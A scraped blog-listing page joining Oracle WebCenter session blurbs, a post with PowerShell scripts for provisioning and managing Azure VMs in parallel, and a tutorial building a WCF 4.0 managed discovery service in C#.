Learn more in this session. ¶ CON8898 - Land Mines, Potholes, and Dirt Roads: Navigating the Way to ECM Nirvana Ten years ago, people were predicting that by this time in history, we’d be some kind of utopian paperless society. As we all know, we’re not there yet, but are we getting closer? What is keeping companies from driving down the road to enterprise content management bliss? Most people understand that using ECM as a central platform enables organizations to expedite document-centric processes, but most business processes in organizations are still heavily paper-based. Many of these processes could be automated and improved with an ECM platform infrastructure. In this panel discussion, you’ll hear from Oracle WebCenter customers that have already solved some of these challenges as they share their strategies for success and roads to avoid along your journey. ¶ CON8908 - Oracle WebCenter Portal: Creating and Using Content Presenter Templates Oracle WebCenter Portal applications use task flows to display and integrate content stored in the Oracle WebCenter Content server. Among the most flexible task flows is Content Presenter, which renders various types of content on an Oracle WebCenter Portal page. Although Oracle WebCenter Portal comes with a set of predefined Content Presenter templates, developers can create their own templates for specific rendering needs. This session shows the lifecycle of developing Content Presenter task flows, including how to create, package, import, modify at runtime, and use such templates. In addition to simple examples with Oracle Application Development Framework (Oracle ADF) UI elements to render the content, it shows how to use other UI technologies, CSS files, and JavaScript libraries. ¶ CON8897 - Using Web Experience Management to Drive Online Marketing Success Every year, the online channel becomes more imperative for driving organizational top-line revenue, but for many companies, mastering how to best market their products and services in a fast-evolving online world with high customer expectations for personalized experiences can be a complex proposition. Come to this panel discussion, and hear directly from online marketers how they are succeeding today by using Web experience management to drive marketing success, using capabilities such as targeting and optimization, user-generated content, mobile site publishing, and site visitor personalization to deliver engaging online experiences. ¶ CON8892 - Oracle’s Journey to Social Business Social business is a revolution, one that is causing rapidly accelerating change in how companies and customers engage with one another and how employees work together. Oracle’s goal in becoming a social business is to create a socially connected organization in which working collaboratively across geographical locations, lines of business, and management chains is second nature, enabling innovative solutions to business challenges. We can achieve this by connecting the right people, finding the right content, communicating with the right people, collaborating at the right time, and building the right communities in the right context—all ready in the CLOUD. Attend this session to see how Oracle is transforming itself into a social business. ¶  ------------ If you've read all the way to the end here - we are REALLY looking forward to seeing you in San Francisco.

    Read the article

  • PowerShell Script to Deploy Multiple VM on Azure in Parallel #azure #powershell

    - by Marco Russo (SQLBI)
    This blog is usually dedicated to Business Intelligence and SQL Server, but I didn’t found easily on the web simple PowerShell scripts to help me deploying a number of virtual machines on Azure that I use for testing and development. Since I need to deploy, start, stop and remove many virtual machines created from a common image I created (you know, Tabular is not part of the standard images provided by Microsoft…), I wanted to minimize the time required to execute every operation from my Windows Azure PowerShell console (but I suggest you using Windows PowerShell ISE), so I also wanted to fire the commands as soon as possible in parallel, without losing the result in the console. In order to execute multiple commands in parallel, I used the Start-Job cmdlet, and using Get-Job and Receive-Job I wait for job completion and display the messages generated during background command execution. This technique allows me to reduce execution time when I have to deploy, start, stop or remove virtual machines. Please note that a few operations on Azure acquire an exclusive lock and cannot be really executed in parallel, but only one part of their execution time is subject to this lock. Thus, you obtain a better response time also in these scenarios (this is the case of the provisioning of a new VM). Finally, when you remove the VMs you still have the disk containing the virtual machine to remove. This cannot be done just after the VM removal, because you have to wait that the removal operation is completed on Azure. So I wrote a script that you have to run a few minutes after VMs removal and delete disks (and VHD) no longer related to a VM. I just check that the disk were associated to the original image name used to provision the VMs (so I don’t remove other disks deployed by other batches that I might want to preserve). These examples are specific for my scenario, if you need more complex configurations you have to change and adapt the code. But if your need is to create multiple instances of the same VM running in a workgroup, these scripts should be good enough. I prepared the following PowerShell scripts: ProvisionVMs: Provision many VMs in parallel starting from the same image. It creates one service for each VM. RemoveVMs: Remove all the VMs in parallel – it also remove the service created for the VM StartVMs: Starts all the VMs in parallel StopVMs: Stops all the VMs in parallel RemoveOrphanDisks: Remove all the disks no longer used by any VMs. Run this script a few minutes after RemoveVMs script. ProvisionVMs # Name of subscription $SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"   # Name of storage account (where VMs will be deployed) $StorageAccount = "Copy the Label property you get from Get-AzureStorageAccount"   function ProvisionVM( [string]$VmName ) {     Start-Job -ArgumentList $VmName {         param($VmName) $Location = "Copy the Location property you get from Get-AzureStorageAccount" $InstanceSize = "A5" # You can use any other instance, such as Large, A6, and so on $AdminUsername = "UserName" # Write the name of the administrator account in the new VM $Password = "Password"      # Write the password of the administrator account in the new VM $Image = "Copy the ImageName property you get from Get-AzureVMImage" # You can list your own images using the following command: # Get-AzureVMImage | Where-Object {$_.PublisherName -eq "User" }         New-AzureVMConfig -Name $VmName -ImageName $Image -InstanceSize $InstanceSize |             Add-AzureProvisioningConfig -Windows -Password $Password -AdminUsername $AdminUsername|             New-AzureVM -Location $Location -ServiceName "$VmName" -Verbose     } }   # Set the proper storage - you might remove this line if you have only one storage in the subscription Set-AzureSubscription -SubscriptionName $SubscriptionName -CurrentStorageAccount $StorageAccount   # Select the subscription - this line is fundamental if you have access to multiple subscription # You might remove this line if you have only one subscription Select-AzureSubscription -SubscriptionName $SubscriptionName   # Every line in the following list provisions one VM using the name specified in the argument # You can change the number of lines - use a unique name for every VM - don't reuse names # already used in other VMs already deployed ProvisionVM "test10" ProvisionVM "test11" ProvisionVM "test12" ProvisionVM "test13" ProvisionVM "test14" ProvisionVM "test15" ProvisionVM "test16" ProvisionVM "test17" ProvisionVM "test18" ProvisionVM "test19" ProvisionVM "test20"   # Wait for all to complete While (Get-Job -State "Running") {     Get-Job -State "Completed" | Receive-Job     Start-Sleep 1 }   # Display output from all jobs Get-Job | Receive-Job   # Cleanup of jobs Remove-Job *   # Displays batch completed echo "Provisioning VM Completed" RemoveVMs # Name of subscription $SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"   function RemoveVM( [string]$VmName ) {     Start-Job -ArgumentList $VmName {         param($VmName)         Remove-AzureService -ServiceName $VmName -Force -Verbose     } }   # Select the subscription - this line is fundamental if you have access to multiple subscription # You might remove this line if you have only one subscription Select-AzureSubscription -SubscriptionName $SubscriptionName   # Every line in the following list remove one VM using the name specified in the argument # You can change the number of lines - use a unique name for every VM - don't reuse names # already used in other VMs already deployed RemoveVM "test10" RemoveVM "test11" RemoveVM "test12" RemoveVM "test13" RemoveVM "test14" RemoveVM "test15" RemoveVM "test16" RemoveVM "test17" RemoveVM "test18" RemoveVM "test19" RemoveVM "test20"   # Wait for all to complete While (Get-Job -State "Running") {     Get-Job -State "Completed" | Receive-Job     Start-Sleep 1 }   # Display output from all jobs Get-Job | Receive-Job   # Cleanup Remove-Job *   # Displays batch completed echo "Remove VM Completed" StartVMs # Name of subscription $SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"   function StartVM( [string]$VmName ) {     Start-Job -ArgumentList $VmName {         param($VmName)         Start-AzureVM -Name $VmName -ServiceName $VmName -Verbose     } }   # Select the subscription - this line is fundamental if you have access to multiple subscription # You might remove this line if you have only one subscription Select-AzureSubscription -SubscriptionName $SubscriptionName   # Every line in the following list starts one VM using the name specified in the argument # You can change the number of lines - use a unique name for every VM - don't reuse names # already used in other VMs already deployed StartVM "test10" StartVM "test11" StartVM "test11" StartVM "test12" StartVM "test13" StartVM "test14" StartVM "test15" StartVM "test16" StartVM "test17" StartVM "test18" StartVM "test19" StartVM "test20"   # Wait for all to complete While (Get-Job -State "Running") {     Get-Job -State "Completed" | Receive-Job     Start-Sleep 1 }   # Display output from all jobs Get-Job | Receive-Job   # Cleanup Remove-Job *   # Displays batch completed echo "Start VM Completed"   StopVMs # Name of subscription $SubscriptionName = "Copy the SubscriptionName property you get from Get-AzureSubscription"   function StopVM( [string]$VmName ) {     Start-Job -ArgumentList $VmName {         param($VmName)         Stop-AzureVM -Name $VmName -ServiceName $VmName -Verbose -Force     } }   # Select the subscription - this line is fundamental if you have access to multiple subscription # You might remove this line if you have only one subscription Select-AzureSubscription -SubscriptionName $SubscriptionName   # Every line in the following list stops one VM using the name specified in the argument # You can change the number of lines - use a unique name for every VM - don't reuse names # already used in other VMs already deployed StopVM "test10" StopVM "test11" StopVM "test12" StopVM "test13" StopVM "test14" StopVM "test15" StopVM "test16" StopVM "test17" StopVM "test18" StopVM "test19" StopVM "test20"   # Wait for all to complete While (Get-Job -State "Running") {     Get-Job -State "Completed" | Receive-Job     Start-Sleep 1 }   # Display output from all jobs Get-Job | Receive-Job   # Cleanup Remove-Job *   # Displays batch completed echo "Stop VM Completed" RemoveOrphanDisks $Image = "Copy the ImageName property you get from Get-AzureVMImage" # You can list your own images using the following command: # Get-AzureVMImage | Where-Object {$_.PublisherName -eq "User" }   # Remove all orphan disks coming from the image specified in $ImageName Get-AzureDisk |     Where-Object {$_.attachedto -eq $null -and $_.SourceImageName -eq $ImageName} |     Remove-AzureDisk -DeleteVHD -Verbose  

    Read the article

  • Service Discovery in WCF 4.0 &ndash; Part 1

    - by Shaun
    When designing a service oriented architecture (SOA) system, there will be a lot of services with many service contracts, endpoints and behaviors. Besides the client calling the service, in a large distributed system a service may invoke other services. In this case, one service might need to know the endpoints it invokes. This might not be a problem in a small system. But when you have more than 10 services this might be a problem. For example in my current product, there are around 10 services, such as the user authentication service, UI integration service, location service, license service, device monitor service, event monitor service, schedule job service, accounting service, player management service, etc..   Benefit of Discovery Service Since almost all my services need to invoke at least one other service. This would be a difficult task to make sure all services endpoints are configured correctly in every service. And furthermore, it would be a nightmare when a service changed its endpoint at runtime. Hence, we need a discovery service to remove the dependency (configuration dependency). A discovery service plays as a service dictionary which stores the relationship between the contracts and the endpoints for every service. By using the discovery service, when service X wants to invoke service Y, it just need to ask the discovery service where is service Y, then the discovery service will return all proper endpoints of service Y, then service X can use the endpoint to send the request to service Y. And when some services changed their endpoint address, all need to do is to update its records in the discovery service then all others will know its new endpoint. In WCF 4.0 Discovery it supports both managed proxy discovery mode and ad-hoc discovery mode. In ad-hoc mode there is no standalone discovery service. When a client wanted to invoke a service, it will broadcast an message (normally in UDP protocol) to the entire network with the service match criteria. All services which enabled the discovery behavior will receive this message and only those matched services will send their endpoint back to the client. The managed proxy discovery service works as I described above. In this post I will only cover the managed proxy mode, where there’s a discovery service. For more information about the ad-hoc mode please refer to the MSDN.   Service Announcement and Probe The main functionality of discovery service should be return the proper endpoint addresses back to the service who is looking for. In most cases the consume service (as a client) will send the contract which it wanted to request to the discovery service. And then the discovery service will find the endpoint and respond. Sometimes the contract and endpoint are not enough. It also contains versioning, extensions attributes. This post I will only cover the case includes contract and endpoint. When a client (or sometimes a service who need to invoke another service) need to connect to a target service, it will firstly request the discovery service through the “Probe” method with the criteria. Basically the criteria contains the contract type name of the target service. Then the discovery service will search its endpoint repository by the criteria. The repository might be a database, a distributed cache or a flat XML file. If it matches, the discovery service will grab the endpoint information (it’s called discovery endpoint metadata in WCF) and send back. And this is called “Probe”. Finally the client received the discovery endpoint metadata and will use the endpoint to connect to the target service. Besides the probe, discovery service should take the responsible to know there is a new service available when it goes online, as well as stopped when it goes offline. This feature is named “Announcement”. When a service started and stopped, it will announce to the discovery service. So the basic functionality of a discovery service should includes: 1, An endpoint which receive the service online message, and add the service endpoint information in the discovery repository. 2, An endpoint which receive the service offline message, and remove the service endpoint information from the discovery repository. 3, An endpoint which receive the client probe message, and return the matches service endpoints, and return the discovery endpoint metadata. WCF 4.0 discovery service just covers all these features in it's infrastructure classes.   Discovery Service in WCF 4.0 WCF 4.0 introduced a new assembly named System.ServiceModel.Discovery which has all necessary classes and interfaces to build a WS-Discovery compliant discovery service. It supports ad-hoc and managed proxy modes. For the case mentioned in this post, what we need to build is a standalone discovery service, which is the managed proxy discovery service mode. To build a managed discovery service in WCF 4.0 just create a new class inherits from the abstract class System.ServiceModel.Discovery.DiscoveryProxy. This class implemented and abstracted the procedures of service announcement and probe. And it exposes 8 abstract methods where we can implement our own endpoint register, unregister and find logic. These 8 methods are asynchronized, which means all invokes to the discovery service are asynchronously, for better service capability and performance. 1, OnBeginOnlineAnnouncement, OnEndOnlineAnnouncement: Invoked when a service sent the online announcement message. We need to add the endpoint information to the repository in this method. 2, OnBeginOfflineAnnouncement, OnEndOfflineAnnouncement: Invoked when a service sent the offline announcement message. We need to remove the endpoint information from the repository in this method. 3, OnBeginFind, OnEndFind: Invoked when a client sent the probe message that want to find the service endpoint information. We need to look for the proper endpoints by matching the client’s criteria through the repository in this method. 4, OnBeginResolve, OnEndResolve: Invoked then a client sent the resolve message. Different from the find method, when using resolve method the discovery service will return the exactly one service endpoint metadata to the client. In our example we will NOT implement this method.   Let’s create our own discovery service, inherit the base System.ServiceModel.Discovery.DiscoveryProxy. We also need to specify the service behavior in this class. Since the build-in discovery service host class only support the singleton mode, we must set its instance context mode to single. 1: using System; 2: using System.Collections.Generic; 3: using System.Linq; 4: using System.Text; 5: using System.ServiceModel.Discovery; 6: using System.ServiceModel; 7:  8: namespace Phare.Service 9: { 10: [ServiceBehavior(InstanceContextMode = InstanceContextMode.Single, ConcurrencyMode = ConcurrencyMode.Multiple)] 11: public class ManagedProxyDiscoveryService : DiscoveryProxy 12: { 13: protected override IAsyncResult OnBeginFind(FindRequestContext findRequestContext, AsyncCallback callback, object state) 14: { 15: throw new NotImplementedException(); 16: } 17:  18: protected override IAsyncResult OnBeginOfflineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state) 19: { 20: throw new NotImplementedException(); 21: } 22:  23: protected override IAsyncResult OnBeginOnlineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state) 24: { 25: throw new NotImplementedException(); 26: } 27:  28: protected override IAsyncResult OnBeginResolve(ResolveCriteria resolveCriteria, AsyncCallback callback, object state) 29: { 30: throw new NotImplementedException(); 31: } 32:  33: protected override void OnEndFind(IAsyncResult result) 34: { 35: throw new NotImplementedException(); 36: } 37:  38: protected override void OnEndOfflineAnnouncement(IAsyncResult result) 39: { 40: throw new NotImplementedException(); 41: } 42:  43: protected override void OnEndOnlineAnnouncement(IAsyncResult result) 44: { 45: throw new NotImplementedException(); 46: } 47:  48: protected override EndpointDiscoveryMetadata OnEndResolve(IAsyncResult result) 49: { 50: throw new NotImplementedException(); 51: } 52: } 53: } Then let’s implement the online, offline and find methods one by one. WCF discovery service gives us full flexibility to implement the endpoint add, remove and find logic. For the demo purpose we will use an internal dictionary to store the services’ endpoint metadata. In the next post we will see how to serialize and store these information in database. Define a concurrent dictionary inside the service class since our it will be used in the multiple threads scenario. 1: [ServiceBehavior(InstanceContextMode = InstanceContextMode.Single, ConcurrencyMode = ConcurrencyMode.Multiple)] 2: public class ManagedProxyDiscoveryService : DiscoveryProxy 3: { 4: private ConcurrentDictionary<EndpointAddress, EndpointDiscoveryMetadata> _services; 5:  6: public ManagedProxyDiscoveryService() 7: { 8: _services = new ConcurrentDictionary<EndpointAddress, EndpointDiscoveryMetadata>(); 9: } 10: } Then we can simply implement the logic of service online and offline. 1: protected override IAsyncResult OnBeginOnlineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state) 2: { 3: _services.AddOrUpdate(endpointDiscoveryMetadata.Address, endpointDiscoveryMetadata, (key, value) => endpointDiscoveryMetadata); 4: return new OnOnlineAnnouncementAsyncResult(callback, state); 5: } 6:  7: protected override void OnEndOnlineAnnouncement(IAsyncResult result) 8: { 9: OnOnlineAnnouncementAsyncResult.End(result); 10: } 11:  12: protected override IAsyncResult OnBeginOfflineAnnouncement(DiscoveryMessageSequence messageSequence, EndpointDiscoveryMetadata endpointDiscoveryMetadata, AsyncCallback callback, object state) 13: { 14: EndpointDiscoveryMetadata endpoint = null; 15: _services.TryRemove(endpointDiscoveryMetadata.Address, out endpoint); 16: return new OnOfflineAnnouncementAsyncResult(callback, state); 17: } 18:  19: protected override void OnEndOfflineAnnouncement(IAsyncResult result) 20: { 21: OnOfflineAnnouncementAsyncResult.End(result); 22: } Regards the find method, the parameter FindRequestContext.Criteria has a method named IsMatch, which can be use for us to evaluate which service metadata is satisfied with the criteria. So the implementation of find method would be like this. 1: protected override IAsyncResult OnBeginFind(FindRequestContext findRequestContext, AsyncCallback callback, object state) 2: { 3: _services.Where(s => findRequestContext.Criteria.IsMatch(s.Value)) 4: .Select(s => s.Value) 5: .All(meta => 6: { 7: findRequestContext.AddMatchingEndpoint(meta); 8: return true; 9: }); 10: return new OnFindAsyncResult(callback, state); 11: } 12:  13: protected override void OnEndFind(IAsyncResult result) 14: { 15: OnFindAsyncResult.End(result); 16: } As you can see, we checked all endpoints metadata in repository by invoking the IsMatch method. Then add all proper endpoints metadata into the parameter. Finally since all these methods are asynchronized we need some AsyncResult classes as well. Below are the base class and the inherited classes used in previous methods. 1: using System; 2: using System.Collections.Generic; 3: using System.Linq; 4: using System.Text; 5: using System.Threading; 6:  7: namespace Phare.Service 8: { 9: abstract internal class AsyncResult : IAsyncResult 10: { 11: AsyncCallback callback; 12: bool completedSynchronously; 13: bool endCalled; 14: Exception exception; 15: bool isCompleted; 16: ManualResetEvent manualResetEvent; 17: object state; 18: object thisLock; 19:  20: protected AsyncResult(AsyncCallback callback, object state) 21: { 22: this.callback = callback; 23: this.state = state; 24: this.thisLock = new object(); 25: } 26:  27: public object AsyncState 28: { 29: get 30: { 31: return state; 32: } 33: } 34:  35: public WaitHandle AsyncWaitHandle 36: { 37: get 38: { 39: if (manualResetEvent != null) 40: { 41: return manualResetEvent; 42: } 43: lock (ThisLock) 44: { 45: if (manualResetEvent == null) 46: { 47: manualResetEvent = new ManualResetEvent(isCompleted); 48: } 49: } 50: return manualResetEvent; 51: } 52: } 53:  54: public bool CompletedSynchronously 55: { 56: get 57: { 58: return completedSynchronously; 59: } 60: } 61:  62: public bool IsCompleted 63: { 64: get 65: { 66: return isCompleted; 67: } 68: } 69:  70: object ThisLock 71: { 72: get 73: { 74: return this.thisLock; 75: } 76: } 77:  78: protected static TAsyncResult End<TAsyncResult>(IAsyncResult result) 79: where TAsyncResult : AsyncResult 80: { 81: if (result == null) 82: { 83: throw new ArgumentNullException("result"); 84: } 85:  86: TAsyncResult asyncResult = result as TAsyncResult; 87:  88: if (asyncResult == null) 89: { 90: throw new ArgumentException("Invalid async result.", "result"); 91: } 92:  93: if (asyncResult.endCalled) 94: { 95: throw new InvalidOperationException("Async object already ended."); 96: } 97:  98: asyncResult.endCalled = true; 99:  100: if (!asyncResult.isCompleted) 101: { 102: asyncResult.AsyncWaitHandle.WaitOne(); 103: } 104:  105: if (asyncResult.manualResetEvent != null) 106: { 107: asyncResult.manualResetEvent.Close(); 108: } 109:  110: if (asyncResult.exception != null) 111: { 112: throw asyncResult.exception; 113: } 114:  115: return asyncResult; 116: } 117:  118: protected void Complete(bool completedSynchronously) 119: { 120: if (isCompleted) 121: { 122: throw new InvalidOperationException("This async result is already completed."); 123: } 124:  125: this.completedSynchronously = completedSynchronously; 126:  127: if (completedSynchronously) 128: { 129: this.isCompleted = true; 130: } 131: else 132: { 133: lock (ThisLock) 134: { 135: this.isCompleted = true; 136: if (this.manualResetEvent != null) 137: { 138: this.manualResetEvent.Set(); 139: } 140: } 141: } 142:  143: if (callback != null) 144: { 145: callback(this); 146: } 147: } 148:  149: protected void Complete(bool completedSynchronously, Exception exception) 150: { 151: this.exception = exception; 152: Complete(completedSynchronously); 153: } 154: } 155: } 1: using System; 2: using System.Collections.Generic; 3: using System.Linq; 4: using System.Text; 5: using System.ServiceModel.Discovery; 6: using Phare.Service; 7:  8: namespace Phare.Service 9: { 10: internal sealed class OnOnlineAnnouncementAsyncResult : AsyncResult 11: { 12: public OnOnlineAnnouncementAsyncResult(AsyncCallback callback, object state) 13: : base(callback, state) 14: { 15: this.Complete(true); 16: } 17:  18: public static void End(IAsyncResult result) 19: { 20: AsyncResult.End<OnOnlineAnnouncementAsyncResult>(result); 21: } 22:  23: } 24:  25: sealed class OnOfflineAnnouncementAsyncResult : AsyncResult 26: { 27: public OnOfflineAnnouncementAsyncResult(AsyncCallback callback, object state) 28: : base(callback, state) 29: { 30: this.Complete(true); 31: } 32:  33: public static void End(IAsyncResult result) 34: { 35: AsyncResult.End<OnOfflineAnnouncementAsyncResult>(result); 36: } 37: } 38:  39: sealed class OnFindAsyncResult : AsyncResult 40: { 41: public OnFindAsyncResult(AsyncCallback callback, object state) 42: : base(callback, state) 43: { 44: this.Complete(true); 45: } 46:  47: public static void End(IAsyncResult result) 48: { 49: AsyncResult.End<OnFindAsyncResult>(result); 50: } 51: } 52:  53: sealed class OnResolveAsyncResult : AsyncResult 54: { 55: EndpointDiscoveryMetadata matchingEndpoint; 56:  57: public OnResolveAsyncResult(EndpointDiscoveryMetadata matchingEndpoint, AsyncCallback callback, object state) 58: : base(callback, state) 59: { 60: this.matchingEndpoint = matchingEndpoint; 61: this.Complete(true); 62: } 63:  64: public static EndpointDiscoveryMetadata End(IAsyncResult result) 65: { 66: OnResolveAsyncResult thisPtr = AsyncResult.End<OnResolveAsyncResult>(result); 67: return thisPtr.matchingEndpoint; 68: } 69: } 70: } Now we have finished the discovery service. The next step is to host it. The discovery service is a standard WCF service. So we can use ServiceHost on a console application, windows service, or in IIS as usual. The following code is how to host the discovery service we had just created in a console application. 1: static void Main(string[] args) 2: { 3: using (var host = new ServiceHost(new ManagedProxyDiscoveryService())) 4: { 5: host.Opened += (sender, e) => 6: { 7: host.Description.Endpoints.All((ep) => 8: { 9: Console.WriteLine(ep.ListenUri); 10: return true; 11: }); 12: }; 13:  14: try 15: { 16: // retrieve the announcement, probe endpoint and binding from configuration 17: var announcementEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["announcementEndpointAddress"]); 18: var probeEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["probeEndpointAddress"]); 19: var binding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding; 20: var announcementEndpoint = new AnnouncementEndpoint(binding, announcementEndpointAddress); 21: var probeEndpoint = new DiscoveryEndpoint(binding, probeEndpointAddress); 22: probeEndpoint.IsSystemEndpoint = false; 23: // append the service endpoint for announcement and probe 24: host.AddServiceEndpoint(announcementEndpoint); 25: host.AddServiceEndpoint(probeEndpoint); 26:  27: host.Open(); 28:  29: Console.WriteLine("Press any key to exit."); 30: Console.ReadKey(); 31: } 32: catch (Exception ex) 33: { 34: Console.WriteLine(ex.ToString()); 35: } 36: } 37:  38: Console.WriteLine("Done."); 39: Console.ReadKey(); 40: } What we need to notice is that, the discovery service needs two endpoints for announcement and probe. In this example I just retrieve them from the configuration file. I also specified the binding of these two endpoints in configuration file as well. 1: <?xml version="1.0"?> 2: <configuration> 3: <startup> 4: <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/> 5: </startup> 6: <appSettings> 7: <add key="announcementEndpointAddress" value="net.tcp://localhost:10010/announcement"/> 8: <add key="probeEndpointAddress" value="net.tcp://localhost:10011/probe"/> 9: <add key="bindingType" value="System.ServiceModel.NetTcpBinding, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/> 10: </appSettings> 11: </configuration> And this is the console screen when I ran my discovery service. As you can see there are two endpoints listening for announcement message and probe message.   Discoverable Service and Client Next, let’s create a WCF service that is discoverable, which means it can be found by the discovery service. To do so, we need to let the service send the online announcement message to the discovery service, as well as offline message before it shutdown. Just create a simple service which can make the incoming string to upper. The service contract and implementation would be like this. 1: [ServiceContract] 2: public interface IStringService 3: { 4: [OperationContract] 5: string ToUpper(string content); 6: } 1: public class StringService : IStringService 2: { 3: public string ToUpper(string content) 4: { 5: return content.ToUpper(); 6: } 7: } Then host this service in the console application. In order to make the discovery service easy to be tested the service address will be changed each time it’s started. 1: static void Main(string[] args) 2: { 3: var baseAddress = new Uri(string.Format("net.tcp://localhost:11001/stringservice/{0}/", Guid.NewGuid().ToString())); 4:  5: using (var host = new ServiceHost(typeof(StringService), baseAddress)) 6: { 7: host.Opened += (sender, e) => 8: { 9: Console.WriteLine("Service opened at {0}", host.Description.Endpoints.First().ListenUri); 10: }; 11:  12: host.AddServiceEndpoint(typeof(IStringService), new NetTcpBinding(), string.Empty); 13:  14: host.Open(); 15:  16: Console.WriteLine("Press any key to exit."); 17: Console.ReadKey(); 18: } 19: } Currently this service is NOT discoverable. We need to add a special service behavior so that it could send the online and offline message to the discovery service announcement endpoint when the host is opened and closed. WCF 4.0 introduced a service behavior named ServiceDiscoveryBehavior. When we specified the announcement endpoint address and appended it to the service behaviors this service will be discoverable. 1: var announcementAddress = new EndpointAddress(ConfigurationManager.AppSettings["announcementEndpointAddress"]); 2: var announcementBinding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding; 3: var announcementEndpoint = new AnnouncementEndpoint(announcementBinding, announcementAddress); 4: var discoveryBehavior = new ServiceDiscoveryBehavior(); 5: discoveryBehavior.AnnouncementEndpoints.Add(announcementEndpoint); 6: host.Description.Behaviors.Add(discoveryBehavior); The ServiceDiscoveryBehavior utilizes the service extension and channel dispatcher to implement the online and offline announcement logic. In short, it injected the channel open and close procedure and send the online and offline message to the announcement endpoint.   On client side, when we have the discovery service, a client can invoke a service without knowing its endpoint. WCF discovery assembly provides a class named DiscoveryClient, which can be used to find the proper service endpoint by passing the criteria. In the code below I initialized the DiscoveryClient, specified the discovery service probe endpoint address. Then I created the find criteria by specifying the service contract I wanted to use and invoke the Find method. This will send the probe message to the discovery service and it will find the endpoints back to me. The discovery service will return all endpoints that matches the find criteria, which means in the result of the find method there might be more than one endpoints. In this example I just returned the first matched one back. In the next post I will show how to extend our discovery service to make it work like a service load balancer. 1: static EndpointAddress FindServiceEndpoint() 2: { 3: var probeEndpointAddress = new EndpointAddress(ConfigurationManager.AppSettings["probeEndpointAddress"]); 4: var probeBinding = Activator.CreateInstance(Type.GetType(ConfigurationManager.AppSettings["bindingType"], true, true)) as Binding; 5: var discoveryEndpoint = new DiscoveryEndpoint(probeBinding, probeEndpointAddress); 6:  7: EndpointAddress address = null; 8: FindResponse result = null; 9: using (var discoveryClient = new DiscoveryClient(discoveryEndpoint)) 10: { 11: result = discoveryClient.Find(new FindCriteria(typeof(IStringService))); 12: } 13:  14: if (result != null && result.Endpoints.Any()) 15: { 16: var endpointMetadata = result.Endpoints.First(); 17: address = endpointMetadata.Address; 18: } 19: return address; 20: } Once we probed the discovery service we will receive the endpoint. So in the client code we can created the channel factory from the endpoint and binding, and invoke to the service. When creating the client side channel factory we need to make sure that the client side binding should be the same as the service side. WCF discovery service can be used to find the endpoint for a service contract, but the binding is NOT included. This is because the binding was not in the WS-Discovery specification. In the next post I will demonstrate how to add the binding information into the discovery service. At that moment the client don’t need to create the binding by itself. Instead it will use the binding received from the discovery service. 1: static void Main(string[] args) 2: { 3: Console.WriteLine("Say something..."); 4: var content = Console.ReadLine(); 5: while (!string.IsNullOrWhiteSpace(content)) 6: { 7: Console.WriteLine("Finding the service endpoint..."); 8: var address = FindServiceEndpoint(); 9: if (address == null) 10: { 11: Console.WriteLine("There is no endpoint matches the criteria."); 12: } 13: else 14: { 15: Console.WriteLine("Found the endpoint {0}", address.Uri); 16:  17: var factory = new ChannelFactory<IStringService>(new NetTcpBinding(), address); 18: factory.Opened += (sender, e) => 19: { 20: Console.WriteLine("Connecting to {0}.", factory.Endpoint.ListenUri); 21: }; 22: var proxy = factory.CreateChannel(); 23: using (proxy as IDisposable) 24: { 25: Console.WriteLine("ToUpper: {0} => {1}", content, proxy.ToUpper(content)); 26: } 27: } 28:  29: Console.WriteLine("Say something..."); 30: content = Console.ReadLine(); 31: } 32: } Similarly, the discovery service probe endpoint and binding were defined in the configuration file. 1: <?xml version="1.0"?> 2: <configuration> 3: <startup> 4: <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0"/> 5: </startup> 6: <appSettings> 7: <add key="announcementEndpointAddress" value="net.tcp://localhost:10010/announcement"/> 8: <add key="probeEndpointAddress" value="net.tcp://localhost:10011/probe"/> 9: <add key="bindingType" value="System.ServiceModel.NetTcpBinding, System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"/> 10: </appSettings> 11: </configuration> OK, now let’s have a test. Firstly start the discovery service, and then start our discoverable service. When it started it will announced to the discovery service and registered its endpoint into the repository, which is the local dictionary. And then start the client and type something. As you can see the client asked the discovery service for the endpoint and then establish the connection to the discoverable service. And more interesting, do NOT close the client console but terminate the discoverable service but press the enter key. This will make the service send the offline message to the discovery service. Then start the discoverable service again. Since we made it use a different address each time it started, currently it should be hosted on another address. If we enter something in the client we could see that it asked the discovery service and retrieve the new endpoint, and connect the the service.   Summary In this post I discussed the benefit of using the discovery service and the procedures of service announcement and probe. I also demonstrated how to leverage the WCF Discovery feature in WCF 4.0 to build a simple managed discovery service. For test purpose, in this example I used the in memory dictionary as the discovery endpoint metadata repository. And when finding I also just return the first matched endpoint back. I also hard coded the bindings between the discoverable service and the client. In next post I will show you how to solve the problem mentioned above, as well as some additional feature for production usage. You can download the code here.   Hope this helps, Shaun All documents and related graphics, codes are provided "AS IS" without warranty of any kind. Copyright © Shaun Ziyan Xu. This work is licensed under the Creative Commons License.

    Read the article

  • Quartz.Net Writing your first Hello World Job

    - by Tarun Arora
